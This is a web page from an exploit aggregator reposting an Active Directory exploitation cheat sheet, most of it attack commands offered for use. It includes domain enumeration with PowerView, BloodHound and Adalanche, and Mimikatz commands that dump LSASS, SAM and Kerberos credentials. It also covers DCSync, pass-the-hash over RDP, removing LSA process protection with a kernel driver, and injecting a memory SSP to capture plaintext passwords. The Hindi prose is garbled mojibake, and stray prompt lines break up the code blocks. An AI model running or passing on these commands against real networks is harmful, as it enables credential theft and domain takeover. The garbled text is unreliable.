## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-S1CKB0Y1337-ACTIVE-DIRECTORY-EXPLOITATION-CHEAT-SHEET
# рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╢реЛрд╖рдг рдЪреАрдЯ рд╢реАрдЯ
рдпрд╣ рдЪреАрдЯ рд╢реАрдЯ рд╡рд┐рдВрдбреЛрдЬ рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреЗ рд▓рд┐рдП рд╕рд╛рдорд╛рдиреНрдп рдЧрдгрдирд╛ рдФрд░ рд╣рдорд▓реЗ рдХреЗ рддрд░реАрдХреЗ рд╢рд╛рдорд┐рд▓ рдХрд░рддреА рд╣реИред
тД╣я╕П рдпрд╣ рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА Nikos Katsiopis рдФрд░ Nikos Vourdas рджреНрд╡рд╛рд░рд╛ рдмрдирд╛рдИ рдЧрдИ рдереАред
рдпрд╣ рдЪреАрдЯ рд╢реАрдЯ PayloadAllTheThings рд░рд┐рдкреЛ рд╕реЗ рдкреНрд░реЗрд░рд┐рдд рд╣реИред

## рд╕рд╛рд░рд╛рдВрд╢
* рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╢реЛрд╖рдг рдЪреАрдЯ рд╢реАрдЯ
* рд╕рд╛рд░рд╛рдВрд╢
* рдЙрдкрдХрд░рдг
* рдбреЛрдореЗрди рдЧрдгрдирд╛
* PowerView рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
* AD рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
* BloodHound рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
* рд░рд┐рдореЛрдЯ BloodHound
* рд╕рд╛рдЗрдЯ рдкрд░ BloodHound
* Adalanche рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
* рд░рд┐рдореЛрдЯ adalanche
* рдЧрдгрдирд╛ рдХреА рдЧрдИ рд╡рд╕реНрддреБрдУрдВ рдХреЛ рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ
* рдЙрдкрдпреЛрдЧреА рдЧрдгрдирд╛ рдЙрдкрдХрд░рдг
* рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐
* рдЙрдкрдпреЛрдЧреА рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдЙрдкрдХрд░рдг
* рдкрд╛рд░реНрд╢реНрд╡ рдЖрдВрджреЛрд▓рди
* Powershell рд░рд┐рдореЛрдЯрд┐рдВрдЧ
* PS рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд╕рд╛рде рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди
* PowerShell рдореЙрдбреНрдпреВрд▓ рдЖрдпрд╛рдд рдХрд░реЗрдВ рдФрд░ рдЗрд╕рдХреЗ рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
* рд░рд┐рдореЛрдЯ рд╕реНрдЯреЗрдЯрдлреБрд▓ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛
* Mimikatz
* рд░рд┐рдореЛрдЯ рдбреЗрд╕реНрдХрдЯреЙрдк рдкреНрд░реЛрдЯреЛрдХреЙрд▓
* URL рдлрд╝рд╛рдЗрд▓ рд╣рдорд▓реЗ
* рдЙрдкрдпреЛрдЧреА рдЙрдкрдХрд░рдг
* рдбреЛрдореЗрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐
* Kerberoast
* ASREPRoast
* рдкрд╛рд╕рд╡рд░реНрдб рд╕реНрдкреНрд░реЗ рд╣рдорд▓рд╛
* SPN рдХреЛ рдмрд▓рдкреВрд░реНрд╡рдХ рд╕реЗрдЯ рдХрд░реЗрдВ
* рд╢реИрдбреЛ рдХреЙрдкреА рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* Mimikatz рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдФрд░ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░реЗрдВ
* рдЕрдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
* рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
* рд╕рдВрд╕рд╛рдзрди рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
* DNSAdmins рджреБрд░реБрдкрдпреЛрдЧ
* рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛-рдПрдХреАрдХреГрдд DNS рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* рдмреИрдХрдЕрдк рдСрдкрд░реЗрдЯрд░реНрд╕ рд╕рдореВрд╣ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* Exchange рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* рдкреНрд░рд┐рдВрдЯрд░ рдмрдЧ рдХреЛ рд╣рдерд┐рдпрд╛рд░ рдмрдирд╛рдирд╛
* ACLs рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* mitm6 рдХреЗ рд╕рд╛рде IPv6 рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* SID рдЗрддрд┐рд╣рд╛рд╕ рджреБрд░реБрдкрдпреЛрдЧ
* SharePoint рдХрд╛ рд╢реЛрд╖рдг
* Zerologon
* PrintNightmare
* рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рд╕реЗрд╡рд╛рдПрдБ
* рдХреЛрдИ PAC рдирд╣реАрдВ
* рдбреЛрдореЗрди рд╕реНрдерд╛рдпрд┐рддреНрд╡
* рдЧреЛрд▓реНрдбрди рдЯрд┐рдХрдЯ рд╣рдорд▓рд╛
* DCsync рд╣рдорд▓рд╛
* рд╕рд┐рд▓реНрд╡рд░ рдЯрд┐рдХрдЯ рд╣рдорд▓рд╛
* рд╕реНрдХреЗрд▓реЗрдЯрди рдХреА рд╣рдорд▓рд╛
* DSRM рджреБрд░реБрдкрдпреЛрдЧ
* рдХрд╕реНрдЯрдо SSP
* рдХреНрд░реЙрд╕ рдлрд╝реЙрд░реЗрд╕реНрдЯ рд╣рдорд▓реЗ
* рдЯреНрд░рд╕реНрдЯ рдЯрд┐рдХрдЯ
* MSSQL рд╕рд░реНрд╡рд░ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* рдлрд╝реЙрд░реЗрд╕реНрдЯ рдЯреНрд░рд╕реНрдЯ рддреЛрдбрд╝рдирд╛
## рдЙрдкрдХрд░рдг
* Powersploit
* PowerUpSQL
* Powermad
* Impacket
* Mimikatz
* Rubeus -> рд╕рдВрдХрд▓рд┐рдд рд╕рдВрд╕реНрдХрд░рдг
* BloodHound
* AD Module
* ASREPRoast
* Adalanche
## рдбреЛрдореЗрди рдЧрдгрдирд╛
### PowerView рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
Powerview v.3.0
Powerview Wiki
* **рд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** `Get-Domain`
* **рдЕрдиреНрдп рдбреЛрдореЗрди рдЧрд┐рдиреЗрдВ:** `Get-Domain -Domain <DomainName>`
* **рдбреЛрдореЗрди SID рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** `Get-DomainSID`
* **рдбреЛрдореЗрди рдиреАрддрд┐ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** ```powershell Get-DomainPolicy
#Will show us the policy configurations of the Domain about system access or kerberos Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
root@kitploit:~
* **рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** ```powershell Get-DomainController Get-DomainController -Domain
root@kitploit:~
* **рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ:** ```powershell #Save all Domain Users to a file Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
#Will return specific properties of a specific user Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
#Enumerate user logged on a machine Get-NetLoggedon -ComputerName
#Enumerate Session Information for a machine Get-NetSession -ComputerName
#Enumerate domain machines of the current/specified domain where specific users are logged into Find-DomainUserLocation -Domain | Select-Object UserName, SessionFromName
root@kitploit:~
* **рдбреЛрдореЗрди рдХрдВрдкреНрдпреВрдЯрд░ рдЧрдгрдирд╛:** ```powershell Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
#Enumerate Live machines Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
root@kitploit:~
тЭЧ **рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╢рд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рде рдбреЛрдореЗрди рдПрдбрдорд┐рди рддрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ (рдкреНрд░рд┐рд╡ рдПрд╕реНрдХ):**
рдореЗрд░реЗ рдкрд╛рд╕ рдПрдХ рдорд╢реАрди рдкрд░ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╣реБрдВрдЪ рд╣реИ -> рдПрдХ рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЙрд╕ рдорд╢реАрди рдкрд░ рдПрдХ рд╕рддреНрд░ рд░рдЦрддрд╛ рд╣реИ -> рдореИрдВ рдЙрд╕рдХрд╛ рдЯреЛрдХрди рдЪреБрд░рд╛рддрд╛ рд╣реВрдВ рдФрд░ рдЙрд╕рдХрд╛ рд░реВрдк рдзрд╛рд░рдг рдХрд░рддрд╛ рд╣реВрдВ -> рд▓рд╛рдн!
### AD рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
* **рд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** `Get-ADDomain`
* **рдЕрдиреНрдп рдбреЛрдореЗрди рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ:** `Get-ADDomain -Identity <Domain>`
* **рдбреЛрдореЗрди SID рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** `Get-DomainSID`
* **рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:** ```powershell Get-ADDomainController Get-ADDomainController -Identity
root@kitploit:~
* **рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдПрдВ:** ```powershell Get-ADUser -Filter * -Identity -Properties *
#Get a specific "string" on a user's attribute Get-ADUser -Filter 'Description -like "_wtver_ "' -Properties Description | select Name, Description
root@kitploit:~
* **рдбреЛрдореЗрди рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ:** ```powershell Get-ADComputer -Filter * -Properties * Get-ADGroup -Filter *
root@kitploit:~
* **Enum Domain Trust:** ```powershell Get-ADTrust -Filter * Get-ADTrust -Identity
root@kitploit:~
* **Enum Forest Trust:** ```powershell Get-ADForest Get-ADForest -Identity
#Domains of Forest Enumeration (Get-ADForest).Domains
root@kitploit:~
* **Enum Local AppLocker Effective Policy:** ```powershell Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
root@kitploit:~
### BloodHound рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
#### рд░рд┐рдореЛрдЯ BloodHound
Python BloodHound рд░рд┐рдкреЙрдЬрд╝рд┐рдЯрд░реА рдпрд╛ рдЗрд╕реЗ `pip3 install bloodhound` рд╕реЗ рдЗрдВрд╕реНрдЯреЙрд▓ рдХрд░реЗрдВ```powershell bloodhound-python -u -p -ns <Domain Controller's Ip> -d -c All
root@kitploit:~
#### рд╕рд╛рдЗрдЯ рдкрд░ BloodHound```powershell
#Using exe ingestor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
#Using PowerShell module ingestor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>
### Adalanche рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛
#### рджреВрд░рд╕реНрде Adalanche```bash
# kali linux:
./adalanche collect activedirectory --domain
\--username Username@Domain \--password
\--server
# Example:
./adalanche collect activedirectory --domain windcorp.local
\--username some-email@example.com \--password 'password123!'
\--server dc.windcorp.htb
## -> Terminating successfully
## Any error?:
# LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?
./adalanche collect activedirectory --domain windcorp.local
\--username some-email@example.com \--password 'password123!'
\--server dc.windcorp.htb --tlsmode NoTLS --port 389
# Invalid Credentials ?
./adalanche collect activedirectory --domain windcorp.local
\--username some-email@example.com \--password 'password123!'
\--server dc.windcorp.htb --tlsmode NoTLS --port 389
\--authmode basic
# Analyze data
# go to web browser -> 127.0.0.1:8080
./adalanche analyze
root@kitploit:~
#### рдЧрдгрдирд╛ рдХрд┐рдП рдЧрдП рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ
рдЖрдк рдХрд┐рд╕реА рднреА рдореЙрдбреНрдпреВрд▓/ cmdlet рд╕реЗ рдЧрдгрдирд╛ рдХрд┐рдП рдЧрдП рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдХреЛ рдмрд╛рдж рдХреЗ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХреЗ рд▓рд┐рдП XML рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдирд┐рд░реНрдпрд╛рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
`Export-Clixml` cmdlet рдХрд┐рд╕реА рдСрдмреНрдЬреЗрдХреНрдЯ рдпрд╛ рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдХрд╛ Common Language Infrastructure (CLI) XML-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдмрдирд╛рддрд╛ рд╣реИ рдФрд░ рдЙрд╕реЗ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд░рддрд╛ рд╣реИред рдлрд┐рд░ рдЖрдк рдЙрд╕ рдлрд╝рд╛рдЗрд▓ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рд╕рд╣реЗрдЬреЗ рдЧрдП рдСрдмреНрдЬреЗрдХреНрдЯ рдХреЛ рдкреБрдирдГ рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП `Import-Clixml` cmdlet рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред```powershell
# Export Domain users to xml file.
Get-DomainUser | Export-CliXml .\DomainUsers.xml
# Later, when you want to utilise them for analysis even on any other machine.
$DomainUsers = Import-CliXml .\DomainUsers.xml
# You can now apply any condition, filters, etc.
$DomainUsers | select name
$DomainUsers | ? {$_.name -match "User's Name"}
### рдЙрдкрдпреЛрдЧреА рдПрдиреНрдпреБрдорд░реЗрд╢рди рдЙрдкрдХрд░рдг
* ldapdomaindump LDAP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕реВрдЪрдирд╛ рдбрдВрдкрд░
* adidnsdump рдХрд┐рд╕реА рднреА рдкреНрд░рдорд╛рдгрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдПрдХреАрдХреГрдд DNS рдбрдВрдкрд┐рдВрдЧ
* ACLight рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЦрд╛рддреЛрдВ рдХреА рдЙрдиреНрдирдд рдЦреЛрдЬ
* ADRecon рд╡рд┐рд╕реНрддреГрдд рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкреБрдирд░реНрдЬреНрдЮрд╛рди рдЙрдкрдХрд░рдг
## рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐
* Windows Local Privilege Escalation Cookbook Windows рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдХреЗ рд▓рд┐рдП рдХреБрдХрдмреБрдХ
* Juicy Potato рд╕рд┐рд╕реНрдЯрдо рдкреНрд░рддрд┐рд░реВрдкрдг рдХреЗ рд▓рд┐рдП SeImpersonate рдпрд╛ SeAssignPrimaryToken рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
тЪая╕П рдХреЗрд╡рд▓ Windows Server 2016 рдФрд░ Windows 10 рдкреИрдЪ 1803 рддрдХ рд╣реА рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ
* Lovely Potato рд╕реНрд╡рдЪрд╛рд▓рд┐рдд Juicy Potato
тЪая╕П рдХреЗрд╡рд▓ Windows Server 2016 рдФрд░ Windows 10 рдкреИрдЪ 1803 рддрдХ рд╣реА рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ
* PrintSpoofer рд╕рд┐рд╕реНрдЯрдо рдкреНрд░рддрд┐рд░реВрдкрдг рдХреЗ рд▓рд┐рдП PrinterBug рдХрд╛ рд╢реЛрд╖рдг
ЁЯЩП Windows Server 2019 рдФрд░ Windows 10 рдХреЗ рд▓рд┐рдП рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ
* RoguePotato рдЙрдиреНрдирдд Juicy Potato
ЁЯЩП Windows Server 2019 рдФрд░ Windows 10 рдХреЗ рд▓рд┐рдП рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ
* рдЯреЛрдХрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* SMBGhost CVE-2020-0796
PoC
* CVE-2021-36934 (HiveNightmare/SeriousSAM)
### рдЙрдкрдпреЛрдЧреА рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдЙрдкрдХрд░рдг
* PowerUp рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
* BeRoot рд╕рд╛рдорд╛рдиреНрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдПрдиреНрдпреБрдорд░реЗрд╢рди рдЙрдкрдХрд░рдг
* Privesc рд╕рд╛рдорд╛рдиреНрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдПрдиреНрдпреБрдорд░реЗрд╢рди рдЙрдкрдХрд░рдг
* FullPowers рд╕реЗрд╡рд╛ рдЦрд╛рддреЗ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреБрдирд░реНрд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдВ
## рдкрд╛рд░реНрд╢реНрд╡ рдЧрддрд┐
### PowerShell рд░рд┐рдореЛрдЯрд┐рдВрдЧ```powershell
#Enable PowerShell Remoting on current Machine (Needs Admin Access) Enable-PSRemoting
#Entering or Starting a new PSSession (Needs Admin Access) $sess = New-PSSession -ComputerName Enter-PSSession -ComputerName OR -Sessions
root@kitploit:~
### рджреВрд░рд╕реНрде рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди PS рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд╕рд╛рде```powershell
$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}
### рдкрд╛рд╡рд░рд╢реЗрд▓ рдореЙрдбреНрдпреВрд▓ рдЖрдпрд╛рдд рдХрд░реЗрдВ рдФрд░ рдЗрд╕рдХреЗ рдлрд╝рдВрдХреНрд╢рди рдХреЛ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ```powershell
#Execute the command and start a session Invoke-Command -Credential $cred -ComputerName -FilePath c:\FilePath\file.ps1 -Session $sess
#Interact with the session Enter-PSSession -Session $sess
root@kitploit:~
### рджреВрд░рд╕реНрде рд╕реНрдЯреЗрдЯрдлреБрд▓ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛```powershell
#Create a new session
$sess = New-PSSession -ComputerName <NameOfComputer>
#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}
### Mimikatz```powershell
#The commands are in cobalt strike format!
#Dump LSASS: mimikatz privilege::debug mimikatz token::elevate mimikatz sekurlsa::logonpasswords
#(Over) Pass The Hash mimikatz privilege::debug mimikatz sekurlsa::pth /user: /ntlm:<> /domain:
#List all available kerberos tickets in memory mimikatz sekurlsa::tickets
#Dump local Terminal Services credentials mimikatz sekurlsa::tspkg
#Dump and save LSASS in a file mimikatz sekurlsa::minidump c:\temp\lsass.dmp
#List cached MasterKeys mimikatz sekurlsa::dpapi
#List local Kerberos AES Keys mimikatz sekurlsa::ekeys
#Dump SAM Database mimikatz lsadump::sam
#Dump SECRETS Database mimikatz lsadump::secrets
#Inject and dump the Domain Controler's Credentials mimikatz privilege::debug mimikatz token::elevate mimikatz lsadump::lsa /inject
#Dump the Domain's Credentials without touching DC's LSASS and also remotely mimikatz lsadump::dcsync /domain: /all
#Dump old passwords and NTLM hashes of a user mimikatz lsadump::dcsync /user:<user> /history
#List and Dump local kerberos credentials mimikatz kerberos::list /dump
#Pass The Ticket mimikatz kerberos::ptt
#List TS/RDP sessions mimikatz ts::sessions
#List Vault credentials mimikatz vault::list
root@kitploit:~
:exclamation: рдХреНрдпрд╛ рд╣реЛрдЧрд╛ рдЕрдЧрд░ mimikatz LSA Protection controls рдХреЗ рдХрд╛рд░рдг credentials dump рдХрд░рдиреЗ рдореЗрдВ рд╡рд┐рдлрд▓ рд░рд╣рддрд╛ рд╣реИ ?
- LSA as a Protected Process (Kernel Land Bypass) ```powershell
#Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
#Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
#Now lets import the mimidriver.sys to the system
mimikatz # !+
#Now lets remove the protection flags from lsass.exe process
mimikatz # !processprotect /process:lsass.exe /remove
#Finally run the logonpasswords function to dump lsass
mimikatz # sekurlsa::logonpasswords
* LSA рдПрдХ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкреНрд░рдХреНрд░рд┐рдпрд╛ (рдпреВрдЬрд╝рд░рд▓реИрдВрдб "рдлрд╝рд╛рдЗрд▓рд▓реЗрд╕" рдмрд╛рдЗрдкрд╛рд╕) рдХреЗ рд░реВрдк рдореЗрдВ
* PPLdump
* LSA рд╕реБрд░рдХреНрд╖рд╛ рдХреЛ рдпреВрдЬрд╝рд░рд▓реИрдВрдб рдореЗрдВ рдмрд╛рдЗрдкрд╛рд╕ рдХрд░рдирд╛
* LSA рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдЧрд╛рд░реНрдб рджреНрд╡рд╛рд░рд╛ рд╡рд░реНрдЪреБрдЕрд▓рд╛рдЗрдЬреНрдб рдкреНрд░рдХреНрд░рд┐рдпрд╛ (LSAISO) рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣рд╛ рд╣реИ ```powershell #Check if a process called lsaiso.exe exists on the running processes tasklist |findstr lsaiso
#If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides mimikatz # misc::memssp
#Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
root@kitploit:~
* рд╡рд┐рд╕реНрддреГрдд Mimikatz рдЧрд╛рдЗрдб
* 2 lsass рд╕реБрд░рдХреНрд╖рд╛ рд╡рд┐рдХрд▓реНрдкреЛрдВ рдХреЗ рд╕рд╛рде рдкрдбрд╝рддрд╛рд▓
### рд░рд┐рдореЛрдЯ рдбреЗрд╕реНрдХрдЯреЙрдк рдкреНрд░реЛрдЯреЛрдХреЙрд▓
рдпрджрд┐ рдЬрд┐рд╕ рд╣реЛрд╕реНрдЯ рдкрд░ рд╣рдо рдкрд╛рд░реНрд╢реНрд╡рд┐рдХ рдЧрддрд┐ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдЙрд╕рдореЗрдВ "RestrictedAdmin" рд╕рдХреНрд╖рдо рд╣реИ, рддреЛ рд╣рдо RDP рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣реИрд╢ рдкрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рдмрд┐рдирд╛ рдПрдХ рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╕рддреНрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
* Mimikatz: ```powershell #We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag privilege::debug sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin"
#Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated
root@kitploit:~
* xFreeRDP:```powershell xfreerdp +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8 /u: /pth: /v:<Hostname | IPAddress>
root@kitploit:~
:exclamation: рдпрджрд┐ рд░рд┐рдореЛрдЯ рдорд╢реАрди рдкрд░ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдореЛрдб рдЕрдХреНрд╖рдо рд╣реИ, рддреЛ рд╣рдо psexec рдпрд╛ winrm рдЬреИрд╕реЗ рдХрд┐рд╕реА рдЕрдиреНрдп рдЯреВрд▓/рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣реЛрд╕реНрдЯ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдирд┐рдореНрди рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рдмрдирд╛рдХрд░ рддрдерд╛ рдЗрд╕рдХрд╛ рдорд╛рди рд╢реВрдиреНрдп рд╕реЗрдЯ рдХрд░рдХреЗ рдЗрд╕реЗ рд╕рдХреНрд╖рдо рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".
- "Single Session per User" рдкреНрд░рддрд┐рдмрдВрдз рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░реЗрдВ
